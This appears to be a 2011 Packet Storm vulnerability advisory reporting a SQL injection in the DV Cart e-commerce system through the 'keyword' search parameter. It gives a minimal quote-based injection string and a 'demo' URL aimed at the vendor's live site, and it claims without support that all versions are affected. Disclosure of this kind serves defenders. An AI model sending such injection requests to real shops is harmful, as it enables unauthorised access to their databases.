DV Cart SQL Injection

2011-08-20T00:00:00
ID PACKETSTORM:104281
Type packetstorm
Reporter Eyup CELIK
Modified 2011-08-20T00:00:00

Description

                                        
                                            `# Exploit Title: DV Cart (E-Commerce System) SQL Injection  
# Date: 19.08.2011  
# Author: Eyup CELIK  
# Software Link: http://www.esmistudio.com  
# Version: All Version  
# Tested on: All versions are Vulnerability  
  
ISSUE  
  
SQL Injection can be done using the command input  
  
Example  
index.php?keyword=<SQL Injection Code>&mod=search&submit=GO  
  
Exploit:  
index.php?keyword='1&mod=search&submit=GO  
  
Demo:  
http://www.esmistudio.com/dv10dis/index.php?keyword=%271&mod=search&submit=GO  
  
  
Thanks,  
  
  
Eyup CELIK  
Bilgi Teknolojileri Güvenlik Uzmani  
http://www.eyupcelik.com.tr  
`